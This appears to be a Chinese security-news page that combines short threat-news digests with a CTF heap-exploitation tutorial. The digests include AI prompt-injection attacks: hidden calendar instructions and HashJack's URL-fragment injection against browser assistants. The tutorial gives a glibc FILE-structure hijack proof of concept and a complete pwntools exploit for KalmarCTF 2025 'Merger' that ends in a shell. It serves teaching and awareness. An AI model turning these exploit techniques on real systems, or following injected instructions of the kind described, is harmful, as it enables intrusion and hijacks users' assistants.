攻击者利用日历订阅功能向400万台iOS/macOS设备推送恶意内容，通过过期域名持续攻击。AI助手可能解析日历中的恶意指令触发越狱，执行未授权操作，用户难以察觉订阅风险。 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、APT组织Bloody Wolf针对中亚发起钓鱼攻击 https://www.group-ib.com/blog/bloody-wolf/ 自2025年6月以来，以“血狼”（Bloody Wolf）为名的高级持续性威胁（APT）组织在中亚地区的网络钓鱼活动激增。该组织通过伪装成政府机构，尤其是司法部，利用诱人的PDF文档和合法域名，诱使受害者下载安装恶意的NetSupport远程管理工具（RAT）。分析显示，攻击者首先通过鱼叉式网络钓鱼邮件传播带有恶意链接的文档，随后诱导用户下载包含Java归档（JAR）文件的压缩包。尽管该组织尚未明确归属，但其活动已扩展至哈萨克斯坦、吉尔吉斯斯坦和乌兹别克斯坦等国。 2、韩国金融业遭麒麟RaaS供应链攻击 https://www.bitdefender.com/en-us/blog/businessinsights/korean-leaks-campaign-targets-south-korean-financial-services-qilin-ransomware 近日，韩国金融服务行业遭遇了一场复杂的供应链攻击，名为“韩国泄密”。该事件涉及著名的勒索软件即服务（RaaS）组织“麒麟”，并可能与朝鲜关联的黑客组织“月光石冰雹”有关。数据显示，韩国在短时间内成为勒索软件攻击的重点目标，尤其集中在金融行业，受害企业数量在迅速增加。攻击者通过入侵托管服务提供商（MSP）获得多个企业的访问权限， 3、恶意Chrome扩展操控Solana并隐秘收费 https://socket.dev/blog/malicious-chrome-extension-injects-hidden-sol-fees-into-solana-swaps 研究团队近日揭露了一款名为“Crypto Copilot”的恶意Chrome扩展，该程序通过操控Solana网络的Raydium交易，悄悄注入未公开的SOL转账，向攻击者的钱包转移交易费用。自2024年6月发布以来，该扩展自称为便捷的交易工具，然而其背后隐藏着复杂的恶意逻辑。在用户进行交易时，扩展会在合法的交易指令中插入一条附加指令，转移一定比例的SOL到攻击者的硬编码钱包。虽然扩展的宣传文案未提及这笔额外费 4、微软Teams访客聊天漏洞致用户面临风险 https://hackread.com/microsoft-teams-guest-chat-flaw-malware/ 研究人员揭示了其B2B来宾访问功能中的一个重大安全漏洞。该漏洞使攻击者能够仅凭一次邀请便可绕过企业的Microsoft Defender保护，带来严重的安全隐患。研究显示，当员工接受外部邀请加入其他公司的聊天时，他们的安全防护将不再由其所属公司控制，而是完全依赖于托管环境。攻击者利用这一点，通过创建基本帐户轻松搭建“无防护区”，使其能够在没有安全防护的情况下进行攻击。这种简化的邀请方式，加上许多组织默认接受来自全球公司的访客邀请，导致大量公司面临潜在的恶意软件攻击和数据 5、新型RelayNFC恶意软件针对巴西发起攻击 https://cyble.com/blog/relaynfc-nfc-relay-malware-targeting-brazil/ 研究人员揭示了一款名为RelayNFC的新型恶意软件，专门针对巴西用户，利用近场通信（NFC）技术进行欺诈性非接触式支付。该恶意软件通过网络钓鱼诱骗用户下载，能够隐蔽地捕获银行卡信息并实时转发到攻击者控制的服务器。RelayNFC使用React Native和Hermes字节码构建，增加了被检测的难度，并且在安全检测平台VirusTotal上尚未被识别，显示出其低可见度和持续开发的潜力。此外，研究还发现了该恶意软件的多种变种，攻击者正在探索实现主机卡模拟（H 6、恶意LLM助力新手黑客发起高级攻击 https://www.bleepingcomputer.com/news/security/malicious-llms-empower-inexperienced-hackers-with-advanced-tools/ 近期出现的恶意大型语言模型（LLM），如WormGPT 4和KawaiiGPT，正在提升网络犯罪分子的攻击能力。这些模型提供自动生成恶意代码的功能，使得经验不足的黑客也能轻松实施复杂的网络攻击。研究表明，WormGPT 4能够生成勒索软件脚本，该脚本使用AES-256算法加密特定文件，并通过Tor网络泄露数据。同时，它还可以创建真实有效的赎金信，声称使用了“军用级加密” 7、HashJack针对AI助手的新型注入攻击 https://www.catonetworks.com/blog/cato-ctrl-hashjack-first-known-indirect-prompt-injection/ 最新研究揭示了一种名为“HashJack”的新型间接提示注入攻击，该攻击针对AI浏览器助手，利用合法URL中的“#”符号隐藏恶意指令。当用户与AI助手交互时，这些隐藏的提示便会被执行，攻击者因此能够实施多种恶意活动。研究表明，HashJack可以通过合法网站操控AI助手，导致数据窃取、虚假信息传播、回调式网络钓鱼和凭证窃取等多种攻击场景。特别是在Comet（Perplexity）、Edge（微软）和Chrome 8、GitLab代码库泄露上万个密钥信息 https://www.bleepingcomputer.com/news/security/public-gitlab-repositories-exposed-more-than-17-000-secrets/ 研究机构对GitLab Cloud上的560万个公共存储库进行了深入扫描，使用TruffleHog工具发现了超过17000个已验证的实时密钥。这些密钥的泄露使得GitLab相较于Bitbucket等其他平台显得更为脆弱，其每个存储库泄露的密钥密度高出约35%。研究机构通过自动化系统将所有存储库名称发送到AWS SQS队列，并使用AWS Lambda函数进行扫描，整个过程耗时约24 9、Handala黑客组织公布以色列高科技专家名单 https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/handalas-latest-publication-targets-israeli-high-tech-specialists/ Handala黑客组织曝光了一份以色列高科技和航空航天领域专业人士的名单，伴随带有攻击性且误导性的描述，将这些个人标记为“罪犯”。这份名单大部分数据疑似来自LinkedIn，缺乏任何证据支持其不当行为，部分信息甚至尚未得到核实。分析显示，Handala的活动已从简单的宣传转向更具攻击性的人肉搜索和情报收集，所发布的数据存在明显矛盾，部 10、伦敦多个市政委员会因网络攻击服务中断 https://www.bleepingcomputer.com/news/security/multiple-london-councils-it-systems-disrupted-by-cyberattack/ 伦敦的肯辛顿和切尔西皇家自治市（RBKC）及威斯敏斯特市议会（WCC）遭遇网络攻击，导致IT系统中断，影响了电话线路和其他服务。两家机构因共享IT基础设施而同步受到影响，紧急启动应急预案以确保居民能获得关键服务。尽管事件仍在处理中，尚无确定的责任方或数据泄露的证据。安全专家认为这是一场针对市政委员会服务提供商的勒索软件攻击，但截至发稿时，没有任何勒索软件组织对此次攻击公开宣称负 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、盗版《战地6》游戏被用于传播恶意软件 https://www.bitdefender.com/en-us/blog/labs/fake-battlefield-6-pirated-games-trainers 研究机构发现，网络犯罪分子利用广受欢迎的EA游戏《战地6》的盗版版本和虚假修改器进行恶意软件传播。这一游戏自10月发布以来，便成为攻击者的目标，他们通过种子网站和论坛散布经过篡改的游戏安装程序，这些程序实际上植入了窃取器和命令与控制（C2）代理。分析发现，这些伪装的“修改器”并不具备实际游戏功能，反而意在窃取用户的敏感信息，包括浏览器数据和加密钱包。专家建议用户仅通过官方渠道下载游戏，避免使用种子文件和第三方工具，以防受害 2、亲俄黑客组织“黑暗风暴”扩展攻击范围 https://thecyberexpress.com/dark-storm-threat-actor-profile/ “黑暗风暴”是一个近年来活跃的亲俄黑客组织，已成为针对欧洲和俄罗斯多个政府机构的主要威胁。该组织以其激进的分布式拒绝服务（DDoS）攻击而闻名，近期更是扩展了攻击范围，包括对关键基础设施如机场和交通网络的直接攻击。作为亲俄联盟Matryoshka 424的一部分，黑暗风暴不仅与其他黑客团体分享资源和情报，还利用网络紧张局势来增强其颠覆能力。其攻击策略通常始于对公共应用程序的漏洞利用，随后实施大规模DDoS和端点拒绝服务攻击，目标包括政府门户网站和在线公民服务。 3、Exchange Online服务中断影响Outlook登录 https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-online-outage-blocks-access-to-outlook-mailboxes/ 微软目前正在调查一起Exchange Online服务的中断事件，导致客户无法通过经典Outlook桌面客户端访问其邮箱。此次故障主要影响亚太和北美地区的用户，用户可能无法连接到其Exchange Online邮箱。虽然具体受影响用户数量尚未披露，但该事件已经在管理中心标记为重大服务问题。作为临时解决方案，微软建议受影响用户使用Outlook网页版访问邮箱。 4、OnSolve CodeRED平台遭网络攻击致服务中断 https://www.bleepingcomputer.com/news/security/onsolve-codered-cyberattack-disrupts-emergency-alert-systems-nationwide/ OnSolve CodeRED平台近日遭遇网络攻击，导致美国多个州和地方政府、警察及消防部门的紧急通知系统中断。攻击使得平台被迫停用，影响了紧急警报和天气预警的发送。虽然Crisis24表示此次攻击仅限于CodeRED环境，并未影响其他系统，但调查发现攻击期间盗取了用户数据，包括姓名、地址、电子邮件和电话号码等。尽管尚无证据显示被盗数据已公开，德克萨斯州大 5、Next.js框架DoS漏洞可致服务器单请求崩溃 https://www.freebuf.com/articles/web/459339.html Next.js框架中新发现的一个高危漏洞，允许攻击者仅通过一次HTTP请求即可使自托管服务器崩溃，且执行攻击所需的资源几乎可以忽略不计。 6、20年老协议NTLM仍威胁全球网络安全 https://www.freebuf.com/articles/system/459198.html 自首次发现二十多年后，NTLM（新技术局域网管理器）认证协议仍在全球范围内威胁着Windows系统的安全。2001年还只是理论上的漏洞，如今已演变成广泛的安全危机，攻击者正积极利用多个NTLM漏洞危害不同地区的网络。 7、麒麟勒索软件攻击韩国28家金融机构 https://www.freebuf.com/articles/es/459244.html 韩国金融业近期遭遇一起复杂的供应链攻击，导致麒麟（Qilin）勒索软件被部署。Bitdefender在向The Hacker News提供的报告中指出："此次攻击结合了主要勒索软件即服务（RaaS）组织麒麟的能力，并可能有朝鲜国家背景的黑客组织Moonstone Sleet参与，以托管服务提供商（MSP）入侵作为初始攻击媒介。" 8、NVIDIA DGX Spark漏洞或致AI机密遭窃取与系统沦陷 https://securityonline.info/critical-patch-nvidia-dgx-spark-flaw-cve-2025-33187-cvss-9-3-exposes-ai-secrets-to-takeover/ NVIDIA紧急修复DGX Spark平台14个漏洞，其中CVE-2025-33187（CVSS 9.3分）可致系统完全沦陷，威胁AI研究数据安全。用户须立即升级至OTA0版本，防止硬件控制权被窃取或数据遭篡改。 9、Apache Syncope漏洞允许攻击者访问内部数据库内容 https://cybersecuritynews.com/apache-syncope-vulnerability/ Apache Syncope多个版本因硬编码加密密钥存在高危漏洞(CVE-2025-65998)，攻击者可恢复明文密码。建议启用AES加密的用户立即升级至3.0.15或4.0.3版本修复漏洞，防止大规模凭证泄露。 10、华硕MyASUS漏洞可使攻击者提升至SYSTEM级权限 https://cybersecuritynews.com/asus-myasus-flaw/ 华硕MyASUS应用曝高危漏洞（CVE-2025-59373），攻击者可本地提权至SYSTEM级别，完全控制设备。CVSS 4.0评分8.5，全球数百万设备受影响。华硕已发布修复版本，建议用户立即更新。 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

在glibc2.34以后取消了__free_hook以及__malloc_hook，因此需要找到一个可以控制程序执行流程的函数指针代替__free_hook以及__malloc_hook。 struct _IO_FILE_plus {    _IO_FILE    file;    IO_jump_t   *vtable; } 在结构体_IO_FILE_plus中存在着类似于虚表的变量vtable，其中存储着许多函数指针。 若能修改vtable指针并指向我们伪造的vtable，即可达成劫持程序执行流程的目的。 但是在glibc2.24之后加入了vtable指针的校验，简单来说就是会检测vtable指针是否在范围之内。因此在glibc2.24之后，需要找在范围内的vtable指针加以利用。 static inline const struct _IO_jump_t * IO_validate_vtable (const struct _IO_jump_t *vtable) {  uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;//计算在glibc中vtable指针的范围  uintptr_t ptr = (uintptr_t) vtable;  uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables; //判断当前vtable指针与起始位置的偏移  if (__glibc_unlikely (offset >= section_length)) //若偏移大于最大距离则校验失败    _IO_vtable_check ();  return vtable; } 在glibc范围内存在着名为_IO_wfile_jumps的vtable指针。该跳转表中存在着一个特殊的函数_IO_wfile_overflow 调用流程如下所示，简单来讲_IO_wfile_overflow最终调用的是_IO_wdoallocbuf将宏拆解，实际最终调用的是fp->_wide_data->_wide_vtable，而在调用fp->_wide_data->_wide_vtable的时候并没有检测vtable的合法性，因此倘若我们能够伪造__wide_data就能够控制_wide_vtable变量，最后将该跳转表内容修改为system，即可完成程序流程的劫持。 /* _IO_wfile_overflow => _IO_wdoallocbuf => _IO_WDOALLOCATE */ wint_t _IO_wfile_overflow (FILE *f, wint_t wch) {  //#define _IO_NO_WRITES         0x0008  //f->_flags & _IO_NO_WRITES == 0  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */   {      f->_flags |= _IO_ERR_SEEN;      __set_errno (EBADF);      return WEOF;   }  //#define _IO_CURRENTLY_PUTTING 0x0800  //f->_flags & _IO_CURRENTLY_PUTTING == 0  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0)   {      //f->_wide_data->_IO_write_base == 0      if (f->_wide_data->_IO_write_base == 0) {      //满足上述条件执行fp->_wide_data->_wide_vtable  _IO_wdoallocbuf (f); ... void _IO_wdoallocbuf (FILE *fp) {  //fp->_wide_data->_IO_buf_base == 0  if (fp->_wide_data->_IO_buf_base)    return;  //#define _IO_UNBUFFERED       0x0002  //fp->_flags & _IO_UNBUFFERED == 0  if (!(fp->_flags & _IO_UNBUFFERED))    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)      return; ... #define _IO_WDOALLOCATE(FP) WJUMP0 (__doallocate, FP) #define WJUMP0(FUNC, THIS) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS) #define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS) #define _IO_WIDE_JUMPS(THIS) \  _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable 根据上述源码我们可以知道，想要执行_IO_wdoallocbuf需要满足以下几个条件 f->_flags & _IO_NO_WRITES == 0 f->_flags & _IO_CURRENTLY_PUTTING == 0 f->_wide_data->_IO_write_base == 0 fp->_wide_data->_IO_buf_base == 0 fp->_flags & _IO_UNBUFFERED == 0 想要让程序执行_IO_wfile_overflow函数需要触发以下调用链 _IO_cleanup函数的作用是清理所有打开的标准I/O流，因此在程序退出时就会调用。 _IO_cleanup函数调用如下所示，实际内部执行的函数为_IO_flush_all int _IO_cleanup (void) {   ...  int result = _IO_flush_all ();   ... } int _IO_flush_all (void) {   ...  for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)   {     ...      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)   || (_IO_vtable_offset (fp) == 0       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr    > fp->_wide_data->_IO_write_base))   )  && _IO_OVERFLOW (fp, EOF) == EOF)         ... } _IO_list_all执行的列表顺序为stderr->stdout->stdin，因此我们可以通过修改stderr->_wide_data与stderr->vtable就可以优先触发利用链，但是依旧需要满足以下限制条件： fp->_mode == 0 fp->_IO_write_ptr > fp->_IO_write_base POC 根据上述条件，总结POC如下 #include <stdio.h> #include <stdlib.h> #include <string.h> struct _IO_jump_t {    void *funcs[27]; // 伪占位，不同glibc版本可能不同 }; struct _IO_FILE_plus {    FILE file;    const struct _IO_jump_t *vtable; }; extern struct _IO_FILE_plus _IO_2_1_stderr_; extern const struct _IO_jump_t _IO_wfile_jumps; long  *fake_IO_wide_data; long *fake_wide_vtable; long * p; int main() {    //_IO_wide_data结构大小为0xe8    fake_IO_wide_data = (long *)malloc(0xe8);    //跳转表结构大小为0xe8    fake_wide_vtable = (long *)malloc(0xa8);    //glibc2.39:_IO_wfile_jumps = _IO_file_jumps + 0x1f8    _IO_2_1_stderr_.vtable = (char *)_IO_2_1_stderr_.vtable + 0x1f8;    stderr->_wide_data = fake_IO_wide_data;    stderr->_IO_write_ptr = 1;    stderr->_IO_write_base = 0;    *(long **)((char *)fake_IO_wide_data + 0xe0) = fake_wide_vtable;    *(long **)((char *)fake_wide_vtable + 0x68) = (long *)system;    //0xfbad为魔数,0x0101是为了拼接后续的sh字符串    memcpy((char *)&stderr->_flags,"\x01\x01\xad\xfb;sh",8);    return 0; } python脚本 #fake_wide_vtable(0xa8) payload  = b'\x00'*0x68 + p64(libcbase + libc.symbols['system']) payload = payload.ljust(0xa8,b"\x00") add(26,0xa8,payload) fake_wide_vtable = heapbase + 0x1770 #fake_IO_wide_data(0xe8) payload = b'\x00' * 0xe0 + p64(fake_wide_vtable) add(25,0xe8,payload) fake_IO_wide_data  = heapbase + 0x1670 #fake stderr(0xe0) fake_stderr                = FileStructure(0) fake_stderr.flags          = u64(b' sh\x00\x00\x00\x00') fake_stderr._IO_write_base = 0 fake_stderr._IO_write_ptr  = 1 # _IO_write_ptr > _IO_write_base fake_stderr._wide_data     = fake_IO_wide_data fake_stderr.vtable         = libc.symbols['_IO_wfile_jumps'] + libcbase fake_stderr._lock          = 0x205700 + libcbase #_IO_stdfile_2_lock fake_stderr_bytes = bytes(fake_stderr) 例题 KalmarCTF 2025-Merger 在merge功能中堆块是通过realloc函数对src与dst堆块进行合并，合并完成之后，使用free函数对src堆块进行释放。但是这里存在一个漏洞点，没有限制src与dst堆块的下标，使得src与dst堆块的下标可以设置为同一个值。 realloc函数在重新分配堆块时会出现以下情况： 当重新申请的堆块的size小于当前堆块的size，则realloc会分割当前堆块 当重新申请的堆块的size大于当前堆块的size，则realloc会先free当前堆块，再malloc申请的size 结合merage功能，当以条件二执行realloc函数时会执行free(s)并紧接着执行free(src)，因此当s=src时，就会导致double free漏洞。 想要利用上述double free漏洞，则需要满足以下条件： realloc申请的堆块要比合并的堆块大（以条件二方式执行realloc函数） double free的堆块size需要小于0x100，否则申请不到（add功能最大只能申请0xff堆块） 漏洞利用流程 设置src与dst的下标为相同值 将malloc(0xf7)的堆块放置在unsortbin中，紧接着src堆块从unsortbin中申请，这样就能够满足double free的堆块size小于0x100 若src堆块从unsortbin中申请，当以条件二方式执行realloc函数时则执行： free(src) 触发unlink，src堆块合并回unsortbin 紧接着执行merge函数的free(src)，则src会放在tcachebin中，则构造出uaf漏洞，泄露libc地址 后续将src堆块放进fastbin中，构造double free漏洞，当相应大小的tcachebin被申请完毕后，fastbin中的堆块会被放置在tcachebin中，从而变相构造出Tcache Poisoning 利用Tcache Poisoning指向堆块（size大于0xe0，由于io_file结构体需要0xe0大小的空间） 利用io_file获得shell EXP from pwn import * sh = process("./merger") libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") context.update(arch='amd64', os='linux', bits=64) def add(index,size,data):    sh.recvuntil("> ")    sh.sendline("1")    sh.recvuntil("dex: ")    sh.sendline(str(index))    sh.recvuntil("ize: ")    sh.sendline(str(size))    sh.recvuntil("ta: ")    sh.send(data)     def delete(index):    sh.recvuntil("> ")    sh.sendline("2")    sh.recvuntil("dex: ")    sh.sendline(str(index)) def show(index):    sh.recvuntil("> ")    sh.sendline("3")    sh.recvuntil("dex: ")    sh.sendline(str(index)) def merge(dst,src):    sh.recvuntil("> ")    sh.sendline("4")    sh.recvuntil("st: ")    sh.sendline(str(dst))    sh.recvuntil("src: ")    sh.sendline(str(src)) for i in range(7):    add(i,0x87,0x87*'a') for i in range(7):    add(i+7,0xf7,0xf7*'a')     add(14,0x87,0x87*'a') add(15,0xf7,0xf7*'a') add(16,0x98,0x98*'a') for i in range(7):    delete(i+7) delete(15) add(14,0x87,0x87*'a') for i in range(7):    delete(i) for i in range(7):    add(i,0xf0,0xf0*'a') #堆块同时释放在unsortbin与tcachebin中 merge(14,14) sh.recvuntil("a"*0x87,drop=True) libc_main_arena = u64(sh.recv(6).ljust(8,b"\x00")) libcbase = libc_main_arena - 0x203b20 log.info("libcbase:"+hex(libcbase)) #修复unsortbin payload = p64(libc_main_arena)*2 payload = payload.ljust(0xf0,b"a") #堆块20与堆块21指向同一个堆块，一个从tcachebin中申请，一个从unsortbin中申请 add(20,0xf0,payload) add(21,0x77,'a'*0x77) add(22,0x77,'a'*0x77) for i in range(7):    add(i,0x77,0x77*'a') for i in range(7):    delete(i) delete(21) show(20)  #uaf泄露数据 heapbase = u64(sh.recvuntil("\n",drop=True).ljust(8,b"\x00"))<<12 log.info("heapbase:"+hex(heapbase)) #fastbin double free delete(22) delete(20) for i in range(7):    add(i,0x77,0x77*'a') for i in range(3):    add(i+7,0xf7,0xf7*'a') for i in range(3):    delete(i+7) #0x77的堆块大小不足以存储IO_File结构体，因此需要利用Tcache Poisoning指向0x100的堆块 payload = p64((heapbase + 0x1670) ^ (heapbase>>12)) payload = payload.ljust(0x77,b"a") add(20,0x77,payload) add(0,0x77,'a'*0x77) add(0,0x77,'a'*0x77) #利用Tcache Poisoning指向_IO_2_1_stderr_ payload = p64((libcbase + libc.symbols['_IO_2_1_stderr_']) ^ (heapbase+0x1000>>12)) payload = payload.ljust(0x77,b"a") add(0,0x77,payload) #fake_wide_vtable(0xa8) payload  = b'\x00'*0x68 + p64(libcbase + libc.symbols['system']) payload = payload.ljust(0xa8,b"\x00") add(26,0xa8,payload) fake_wide_vtable = heapbase + 0x1770 #fake_IO_wide_data(0xe8) payload = b'\x00' * 0xe0 + p64(fake_wide_vtable) add(25,0xe8,payload) fake_IO_wide_data  = heapbase + 0x1670 #fake stderr(0xe0) fake_stderr                = FileStructure(0) fake_stderr.flags          = u64(b' sh\x00\x00\x00\x00') fake_stderr._IO_write_base = 0 fake_stderr._IO_write_ptr  = 1 # _IO_write_ptr > _IO_write_base fake_stderr._wide_data     = fake_IO_wide_data fake_stderr.vtable         = libc.symbols['_IO_wfile_jumps'] + libcbase fake_stderr._lock          = 0x205700 + libcbase #_IO_stdfile_2_lock fake_stderr_bytes = bytes(fake_stderr) print(hex(len(fake_stderr_bytes))) add(2,0xf0,fake_stderr_bytes+p64(0xfbad2887)+b"\n") sh.interactive()